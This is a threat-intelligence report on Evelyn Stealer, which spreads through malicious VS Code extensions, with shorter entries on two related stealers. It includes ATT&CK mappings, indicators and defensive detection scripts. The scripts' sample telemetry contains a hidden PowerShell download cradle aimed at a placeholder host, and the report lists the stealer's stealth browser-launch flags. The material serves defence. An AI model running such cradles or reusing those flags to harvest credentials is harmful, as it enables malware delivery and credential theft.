Full Report
Cybersecurity researchers have disclosed details of a malware campaign that's targeting software developers with a new information stealer called Evelyn Stealer by weaponizing the Microsoft Visual Studio Code (VS Code) extension ecosystem. "The malware is designed to exfiltrate sensitive information, including developer credentials and cryptocurrency-related data. Compromised developer
Analysis Summary
# Tool/Technique: Evelyn Stealer
## Overview
Evelyn Stealer is a newly disclosed information-stealing malware primarily targeting software developers by masquerading within the Microsoft Visual Studio Code (VS Code) extension ecosystem. Its main goal is to exfiltrate sensitive developer data, credentials, and cryptocurrency-related information from compromised environments.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Windows (implied by use of PowerShell, DLLs, and Windows process injection into `grpconv.exe`)
- Capabilities: Data exfiltration, process injection, anti-analysis/anti-VM checks, browser credential theft.
- First Seen: Campaign activity was first documented by Koi Security in December 2025 (the article, dated Jan 20, 2026, says "last month"); Trend Micro published its own analysis on Monday, Jan 19, 2026.
## MITRE ATT&CK Mapping
*Note: The excerpt publishes no ATT&CK IDs. The mapping below is derived only from the behaviors it describes; no persistence or privilege-escalation mechanism is described, so none is mapped.*
- **TA0001 - Initial Access**
- **T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain** (malicious extensions distributed through the VS Code extension ecosystem)
- **TA0002 - Execution**
- **T1204.002 - User Execution: Malicious File** (the developer installs the extension, which drops `Lightshot.dll`)
- **T1059.001 - Command and Scripting Interpreter: PowerShell** (hidden PowerShell command fetches and runs `runtime.exe`)
- **TA0005 - Defense Evasion**
- **T1027 - Obfuscated Files or Information** (encrypted stealer payload carried by `runtime.exe`)
- **T1140 - Deobfuscate/Decode Files or Information** (`runtime.exe` decrypts the payload before injecting it)
- **T1055 - Process Injection** (payload injected into `grpconv.exe`)
- **T1497 - Virtualization/Sandbox Evasion** (anti-VM and anti-analysis checks)
- **T1564.003 - Hide Artifacts: Hidden Window** (hidden PowerShell window; browser relaunched off-screen at 1x1)
- **TA0006 - Credential Access**
- **T1555.003 - Credentials from Password Stores: Credentials from Web Browsers** (Google Chrome and Microsoft Edge logins)
- **T1539 - Steal Web Session Cookie** (Chrome and Edge cookies)
- **T1552 - Unsecured Credentials** (stored Wi-Fi credentials)
- **TA0007 - Discovery**
- **T1082 - System Information Discovery**, **T1057 - Process Discovery**, **T1518 - Software Discovery** (system information, running processes, installed applications)
- **TA0009 - Collection**
- **T1115 - Clipboard Data**, **T1113 - Screen Capture**, **T1005 - Data from Local System** (clipboard content, screenshots, cryptocurrency wallet data)
- **T1560 - Archive Collected Data** (collected data bundled into a ZIP before upload)
- **TA0011 - Command and Control**
- **T1105 - Ingress Tool Transfer** (second-stage `runtime.exe` downloaded by the PowerShell command)
- **TA0010 - Exfiltration**
- **T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol** (ZIP uploaded over FTP; FTP is cleartext, so both the archive and the FTP credentials are visible on the wire)
## Functionality
### Core Capabilities
- **Initial Delivery:** Delivered via malicious VS Code extensions (e.g., `BigBlack.bitcoin-black`, `BigBlack.codo-ai`, `BigBlack.mrbigblacktheme`) which drop a malicious DLL (`Lightshot.dll`).
- **Staging:** The DLL executes a hidden PowerShell command to fetch and execute a second-stage payload (`runtime.exe`).
- **Infection/Execution:** `runtime.exe` decrypts and injects the main stealer payload into a legitimate Windows process (`grpconv.exe`) in memory.
- **Data Collection:** Gathers a wide array of sensitive information, including clipboard content, installed applications, cryptocurrency wallet data, running processes, system information, screenshots, stored Wi-Fi credentials, and credentials/cookies from Google Chrome and Microsoft Edge.
- **Exfiltration:** Bundles collected data into a ZIP file and exfiltrates it via FTP to a remote server.
- **Execution Control:** Creates a mutex object to ensure only one instance of the malware runs at a time.
### Advanced Features
- **Anti-Analysis/Anti-VM:** Implements safeguards to detect forensic analysis environments and virtual machines.
- **Process Termination:** Terminates running browser processes before harvesting, because Chromium-based browsers keep their cookie and login databases open (and locked) while running; killing the browser releases those files for copying.
- **Browser Evasion:** Relaunches the browser headless with flags that suppress any visible window and switch off protections, so the user sees nothing: `--headless=new`, `--disable-gpu`, `--no-sandbox` (disables the Chromium sandbox), `--disable-extensions` (prevents security extensions from loading), `--disable-logging`, `--silent-launch`, `--no-first-run`, `--disable-popup-blocking`, with the window positioned off-screen (`--window-position=-10000,-10000`) and shrunk to a single pixel (`--window-size=1,1`). A browser started with this combination by anything other than a known test harness is a strong signal on its own.
## Indicators of Compromise
- File Hashes: [Not provided in the excerpt]
- File Names: `Lightshot.dll` (downloader), `runtime.exe` (second stage executable)
- Registry Keys: [Not provided in the excerpt]
- Network Indicators: `server09[.]mentality[.]cloud` (C2 server)
- Behavioral Indicators: Use of PowerShell to fetch remote payloads; injection into `grpconv.exe`; FTP transfer of ZIP files; creation of a mutex object.
## Associated Threat Actors
The actors deploying Evelyn Stealer are not explicitly named, but the campaign targets high-value software developer organizations with access to production systems or cloud resources.
## Detection Methods
- **Signature-based detection:** Hashes once they are published; the file names `Lightshot.dll` and `runtime.exe` are usable as a weak signal but are trivially renamed, so pair them with the behaviors below.
- **Behavioral detection:** Monitoring for process injection into `grpconv.exe`, the specific command-line arguments used when launching browsers, FTP activity initiated by non-standard processes, and the creation of specific mutexes.
- **YARA rules:** Rules targeting the unique embedded strings or decryption routines used by the payload.
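The behavioral checks above, expressed as rules over process-creation telemetry. This is an added example and not code from the report or from Trend Micro; the event fields (image, parent image, command line) mirror Sysmon Event ID 1 in simplified form, the sample events are constructed, and the set of parents from which the extension's DLL loader might spawn PowerShell is an assumption, since the excerpt does not say how `Lightshot.dll` is loaded.

```python
"""Flag Evelyn Stealer-style execution chains in process-creation events.

Added example, not from the report. Three rules, each tied to a behavior the
report describes: (1) a browser relaunched headless/off-screen by a non-browser
parent, (2) a PowerShell download cradle in a hidden window or from a loader
parent, (3) any creation of grpconv.exe, which is rarely executed on a modern
Windows host and is the injection target here.
"""
import re
from dataclasses import dataclass

BROWSERS = {"chrome.exe", "msedge.exe"}
# Flags the report lists for the stealer's browser relaunch.
HEADLESS_FLAGS = {
    "--headless=new", "--disable-gpu", "--no-sandbox", "--disable-extensions",
    "--disable-logging", "--silent-launch", "--no-first-run",
    "--disable-popup-blocking",
}
OFFSCREEN = re.compile(r"--window-position=-\d+,-\d+|--window-size=1,1\b")
CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|Start-BitsTransfer",
    re.I,
)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Assumption: parents from which the extension's DLL loader could spawn PowerShell.
LOADER_PARENTS = {"code.exe", "rundll32.exe", "regsvr32.exe"}


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits = []
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    if img in BROWSERS and parent not in BROWSERS:
        present = {flag for flag in HEADLESS_FLAGS if flag in cl}
        # Off-screen/1x1 window alone is decisive; otherwise require 3+ stealth flags.
        if OFFSCREEN.search(cl) or len(present) >= 3:
            hits.append("browser-headless-harvest")
    if img == "powershell.exe" and CRADLE.search(cl) and (HIDDEN.search(cl) or parent in LOADER_PARENTS):
        hits.append("powershell-download-cradle")
    if img == "grpconv.exe":
        hits.append("grpconv-spawned")
    return hits


def scan(events: list[ProcEvent]) -> list[tuple[str, list[str]]]:
    """(image basename, hits) for every event that matched at least one rule."""
    return [(basename(e.image), h) for e in events if (h := classify(e))]


# Constructed sample telemetry (not real captures). The download URL is a placeholder.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\System32\grpconv.exe",
              '"chrome.exe" --headless=new --disable-gpu --no-sandbox --disable-extensions --disable-logging '
              '--silent-launch --no-first-run --disable-popup-blocking --window-position=-10000,-10000 --window-size=1,1'),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Windows\explorer.exe",
              '"chrome.exe" --profile-directory=Default'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Users\dev\AppData\Local\Programs\Microsoft VS Code\Code.exe",
              "powershell.exe -w hidden -ep bypass -c \"(New-Object Net.WebClient).DownloadFile("
              "'https://example.invalid/runtime.exe','C:\\Users\\dev\\AppData\\Local\\Temp\\runtime.exe')\""),
    ProcEvent(r"C:\Windows\System32\grpconv.exe", r"C:\Users\dev\AppData\Local\Temp\runtime.exe", "grpconv.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              "powershell.exe Get-Process"),
    # A puppeteer-style test run: legitimate, but it trips the browser rule and shows where tuning is needed.
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Program Files\nodejs\node.exe",
              '"chrome.exe" --headless=new --disable-gpu --no-sandbox --remote-debugging-pipe'),
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_EVENTS):
        print(image, hits)
```

The last sample event is the expected false positive: CI runners and UI-test hosts launch headless Chromium with `--no-sandbox` routinely, so in production the browser rule should carry an allowlist of parent images (or hosts) rather than alerting on every match. The `grpconv.exe` rule has no such problem; on a workstation it should essentially never fire.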
## Mitigation Strategies
- **Prevention measures:** Strict vetting and limited installation of VS Code extensions, especially from untrusted sources. Implement least privilege access for developers.
- **Hardening recommendations:** Enhance monitoring of process injection activity (e.g., using EDR solutions). Restrict outbound FTP connections from developer workstations unless explicitly required. Audit developer environments for unusual execution chains involving DLL loading and PowerShell.
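One way to operationalize the extension vetting above is to audit what is actually installed on developer machines against a publisher allowlist and the extension IDs named in the report. The script below is an added example, not from the report or from Microsoft. It reads the per-user inventory VS Code keeps at `~/.vscode/extensions/extensions.json` (on Windows `%USERPROFILE%\.vscode\extensions\extensions.json`), whose entries carry the extension ID under `identifier.id`, or the output of `code --list-extensions --show-versions`; the allowlist and the sample inventory are constructed.

```python
"""Audit installed VS Code extensions against an allowlist and the report's IOCs.

Added example, not from the report. Marketplace extension IDs have the form
publisher.name and are matched case-insensitively.
"""
import json
from pathlib import Path

# Extension IDs named in the report.
KNOWN_BAD = {"bigblack.bitcoin-black", "bigblack.codo-ai", "bigblack.mrbigblacktheme"}
BAD_PUBLISHERS = {ext_id.split(".", 1)[0] for ext_id in KNOWN_BAD}
# Constructed allowlist; an organisation would maintain its own (assumption).
ALLOWED_PUBLISHERS = {"ms-python", "ms-vscode", "dbaeumer", "esbenp"}


def extension_ids_from_json(text: str) -> list[str]:
    """IDs from extensions.json: a JSON array whose entries carry identifier.id."""
    return [e["identifier"]["id"] for e in json.loads(text) if "identifier" in e]


def extension_ids_from_cli(text: str) -> list[str]:
    """IDs from `code --list-extensions --show-versions` (publisher.name@version per line)."""
    return [line.strip().split("@", 1)[0] for line in text.splitlines() if line.strip()]


def audit(ext_ids, allowed_publishers=ALLOWED_PUBLISHERS, known_bad=KNOWN_BAD) -> list[tuple[str, str]]:
    """Return (extension id, verdict) for every extension that is not cleanly allowlisted."""
    bad_publishers = {b.split(".", 1)[0] for b in known_bad}
    findings = []
    for ext_id in ext_ids:
        eid = ext_id.strip().lower()
        publisher = eid.split(".", 1)[0]
        if eid in known_bad:
            findings.append((eid, "known-malicious"))
        elif publisher in bad_publishers:
            # Same publisher as a known-bad extension: treat as hostile until reviewed.
            findings.append((eid, "publisher-of-known-malicious"))
        elif publisher not in allowed_publishers:
            findings.append((eid, "not-allowlisted"))
    return findings


def audit_installed(path: Path = Path.home() / ".vscode" / "extensions" / "extensions.json"):
    """Audit the current user's real inventory; returns [] if VS Code is not installed."""
    if not path.is_file():
        return []
    return audit(extension_ids_from_json(path.read_text(encoding="utf-8")))


# Constructed sample inventory in the extensions.json shape (not a real capture).
SAMPLE_EXTENSIONS_JSON = json.dumps([
    {"identifier": {"id": "ms-python.python"}, "version": "2025.1.0"},
    {"identifier": {"id": "BigBlack.codo-ai"}, "version": "1.0.3"},
    {"identifier": {"id": "someone.random-theme"}, "version": "0.0.1"},
])
SAMPLE_CLI_OUTPUT = "BigBlack.other-tool@0.9.0\nms-vscode.cpptools@1.22.0\n"

if __name__ == "__main__":
    for ext_id, verdict in audit_installed():
        print(f"{verdict:30} {ext_id}")
```

Run it from a login script or an endpoint-management job and ship the findings to the SIEM; a `known-malicious` or `publisher-of-known-malicious` verdict should trigger the same response as any other stealer detection, since the extension has already executed. Recent VS Code releases also provide an `extensions.allowed` setting for enforcing a publisher allowlist centrally, which prevents the install rather than detecting it after the fact.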
## Related Tools/Techniques
Other newly disclosed Python-based stealers mentioned in the context:
- **MonetaStealer:** Also capable of targeting Apple macOS systems.
- **SolyxImmortal:** Leverages legitimate system APIs and Discord webhooks for exfiltration.
---
# Tool/Technique: MonetaStealer (Mentioned Contextually)
## Overview
MonetaStealer is a new Python-based information stealer malware family, mentioned alongside Evelyn Stealer, noted for its capability to target Apple macOS systems in addition to other platforms.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Apple macOS (and implied others)
- Capabilities: Data theft.
- First Seen: Contextually recent with Evelyn Stealer disclosures.
## MITRE ATT&CK Mapping
*Mapping based on general Stealer TTPs, specific details unknown.*
- **TA0009 - Collection**
- **TA0010 - Exfiltration**
## Functionality
### Core Capabilities
- Comprehensive data theft across platforms including macOS.
### Advanced Features
- [Not detailed in the excerpt]
## Indicators of Compromise
- [Not provided in the excerpt]
## Associated Threat Actors
- [Not provided in the excerpt]
## Detection Methods
- [Not provided in the excerpt]
## Mitigation Strategies
- [General hardening against information stealers]
## Related Tools/Techniques
- Evelyn Stealer
- SolyxImmortal
---
# Tool/Technique: SolyxImmortal (Mentioned Contextually)
## Overview
SolyxImmortal is a Python-based malware family emphasizing stealth and long-term access. It operates entirely in user space, leveraging legitimate system APIs and third-party libraries to extract user data, which is then exfiltrated via attacker-controlled Discord webhooks.
## Technical Details
- Type: Malware family (Information Stealer)
- Platform: Not stated in the excerpt; the malware is Python-based, so it is not necessarily limited to Windows.
- Capabilities: Stealthy data extraction and exfiltration to attacker-controlled Discord webhooks.
- First Seen: Contextually recent with Evelyn Stealer disclosures.
## MITRE ATT&CK Mapping
*Mapping based on the disclosed exfiltration channel and operational style. The emphasis on long-term access points at persistence (TA0003), but the excerpt describes no mechanism, so no technique is mapped for it.*
- **TA0005 - Defense Evasion** (operates entirely in user space and blends into traffic to a trusted platform)
- **TA0009 - Collection**
- **T1005 - Data from Local System** (user data extracted through legitimate system APIs and third-party libraries)
- **TA0010 - Exfiltration**
- **T1567.004 - Exfiltration Over Web Service: Exfiltration Over Webhook** (attacker-controlled Discord webhooks)
## Functionality
### Core Capabilities
- Extracts sensitive user data using legitimate system APIs and third-party libraries.
- Exfiltrates collected data to attacker-controlled Discord webhooks.
### Advanced Features
- Design emphasizes stealth, reliability, and long-term access over rapid execution.
- Reduced likelihood of immediate detection by operating solely in user space and by sending data to a trusted platform (Discord) whose traffic blends in with legitimate use. Webhooks are write-only, so Discord serves here as an exfiltration channel rather than as interactive command and control.
## Indicators of Compromise
- Network Indicators: Attacker-controlled Discord webhooks.
## Associated Threat Actors
- [Not provided in the excerpt]
## Detection Methods
- Behavioral monitoring for unusual use of third-party libraries for data exfiltration.
- Monitoring API calls related to data access coupled with outbound traffic to Discord URLs.
## Mitigation Strategies
- Implement EDR to monitor legitimate libraries being misused for data gathering.
- Network filtering for suspicious outbound connections to Discord webhook URLs if not used for legitimate business purposes.
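The two network-side controls on this page, the FTP restriction for developer workstations in the Evelyn Stealer section and the Discord webhook filtering here, can be checked with the same pass over egress logs. The script below is an added example, not from the report or from either malware's analysis; the log format (one CSV line per connection with host, port, application, method and URL), the developer subnet and the sample lines are all constructed, and the Discord webhook URL shape is Discord's public API path.

```python
"""Flag stealer-style egress in constructed proxy/firewall log lines.

Added example, not from the report. Three checks: FTP leaving the developer
subnet (Evelyn Stealer), POSTs to Discord webhook URLs (SolyxImmortal), and a
plain IOC match on the C2 host the report publishes.
"""
import csv
import io
import ipaddress
import re

DEV_SUBNET = ipaddress.ip_network("10.20.0.0/16")  # assumption: where developer workstations live
IOC_HOSTS = {"server09.mentality.cloud"}           # from the report's network indicators
# Discord webhook endpoints: discord.com / discordapp.com, optional canary/ptb, optional API version.
WEBHOOK = re.compile(
    r"^https?://(?:(?:canary|ptb)\.)?discord(?:app)?\.com/api/(?:v\d+/)?webhooks/\d+/[\w-]+",
    re.I,
)


def classify_line(row: dict) -> list[str]:
    """Return the names of every check the log row matches (empty list if none)."""
    hits = []
    src = ipaddress.ip_address(row["src_ip"])
    port = int(row["dst_port"])
    if src in DEV_SUBNET and (port == 21 or row["app"].lower() == "ftp"):
        hits.append("ftp-egress-from-dev")
    if row["method"].upper() == "POST" and WEBHOOK.match(row["url"]):
        hits.append("discord-webhook-post")
    if row["dst_host"].lower() in IOC_HOSTS:
        hits.append("evelyn-c2-ioc")
    return hits


def scan(log_text: str) -> list[tuple[str, list[str]]]:
    """(timestamp, hits) for every row that matched at least one check."""
    reader = csv.DictReader(io.StringIO(log_text))
    return [(row["ts"], h) for row in reader if (h := classify_line(row))]


# Constructed sample log (not a real capture). The webhook id/token are placeholders.
SAMPLE_LOG = """ts,src_ip,dst_host,dst_port,app,method,url
2026-01-19T09:14:02Z,10.20.4.17,server09.mentality.cloud,21,ftp,,
2026-01-19T09:14:05Z,10.20.4.17,discord.com,443,ssl,POST,https://discord.com/api/webhooks/1234567890/abcDEF_ghi-jkl
2026-01-19T09:15:00Z,10.20.4.21,discord.com,443,ssl,GET,https://discord.com/api/v9/users/@me
2026-01-19T09:16:30Z,10.50.1.5,ftp.example.org,21,ftp,,
2026-01-19T09:17:11Z,10.20.4.17,api.github.com,443,ssl,GET,https://api.github.com/repos
"""

if __name__ == "__main__":
    for ts, hits in scan(SAMPLE_LOG):
        print(ts, hits)
```

Two caveats when applying this to real traffic. The webhook check needs the request path, which is only visible from a proxy that terminates TLS (or from endpoint telemetry); a firewall that sees only SNI can tell you a host talked to `discord.com`, not that it posted to a webhook. And the FTP check is only as good as the subnet definition: if developer workstations are not cleanly segmented, the better control is the one stated above, blocking outbound port 21 by default and allowing it per host where it is genuinely required.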
## Related Tools/Techniques
- Evelyn Stealer
- MonetaStealer